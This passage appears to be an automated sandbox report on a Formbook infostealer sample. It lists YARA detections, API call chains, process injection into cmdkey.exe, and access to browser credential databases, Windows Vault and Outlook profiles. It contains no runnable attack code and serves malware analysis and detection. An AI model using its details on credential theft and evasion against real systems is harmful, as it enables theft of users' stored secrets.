        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029500 NtClose,5_2_03029500
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029460 NtDeleteFile,5_2_03029460
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368F36F NtReadVirtualMemory,5_2_0368F36F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030E2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,3_2_004030E2
        Source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.000000000322B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdkey.exej% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000003.17112324273.0000000033857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000003.17166111623.0000000003207000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdkey.exej% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000002.17223941373.0000000033BA0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000003.17108712152.00000000336A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/12@18/14
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_004042BD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042BD
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile created: C:\Program Files (x86)\sorteringsordenens.lnkJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile created: C:\Users\user\AppData\Local\Temp\nsq14BA.tmpJump to behavior
        Source: ImBm40hNZ2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: cmdkey.exe, 00000005.00000002.21528309746.00000000080A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: cmdkey.exe, 00000005.00000003.17387345441.0000000003146000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F7000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.0000000008102000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: ImBm40hNZ2.exeReversingLabs: Detection: 39%
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile read: C:\Users\user\Desktop\ImBm40hNZ2.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"Jump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: sorteringsordenens.lnk.0.drLNK file: ..\Users\Public\Music\chieftainship.bar
        Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: ImBm40hNZ2.exeStatic file information: File size 1094223 > 1048576
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aypAdCUEzlG.exe, 00000004.00000000.17122430937.000000000032E000.00000002.00000001.01000000.00000008.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21523593349.000000000032E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: cmdkey.pdbGCTL source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ImBm40hNZ2.exe, ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmdkey.pdb source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.16987895895.00000000034AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EBC
        Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x46d2
        Source: ImBm40hNZ2.exeStatic PE information: real checksum: 0x10df67 should be: 0x11a2e4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_10002D40 push eax; ret 0_2_10002D6E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D21AD pushad ; retf 0004h3_2_338D223F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D97A1 push es; iretd 3_2_338D97A8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339008CD push ecx; mov dword ptr [esp], ecx3_2_339008D6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038821AD pushad ; retf 0004h5_2_0388223F
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038897A1 push es; iretd 5_2_038897A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038B08CD push ecx; mov dword ptr [esp], ecx5_2_038B08D6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301F140 push edi; iretd 5_2_0301F148
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030051EA push FFFFFF9Ch; ret 5_2_030051EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030117A7 push eax; ret 5_2_030117C2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301B60B push ss; ret 5_2_0301B60C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301754C push 0000002Dh; ret 5_2_0301755E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03012581 push edx; retf 5_2_0301258A
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03001AEA push ecx; ret 5_2_03001AEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03020843 push esp; iretd 5_2_0302086F
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03003F40 push ebp; iretd 5_2_03004003
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03019E4A push esi; ret 5_2_03019E5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03019E50 push esi; ret 5_2_03019E5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03686245 push ecx; iretd 5_2_0368627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368F10A push 096B400Eh; ret 5_2_0368F117
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_036861F9 push ecx; iretd 5_2_0368627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368562C push ss; retf 5_2_03685636
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03687585 push sp; ret 5_2_03687589
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03686438 push ebp; retf 5_2_0368643B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368F4A3 push D8275BBDh; retf 5_2_0368F4A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03685BE8 push ss; iretd 5_2_03685CB1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03686AE9 pushad ; retf 5_2_03686B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368CE73 push ebp; iretd 5_2_0368CE78
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368CD75 push FFFFFFA0h; retf 5_2_0368CDEA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368CDF8 push ebp; iretd 5_2_0368CE78
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03685C32 push ss; iretd 5_2_03685CB1
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile created: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
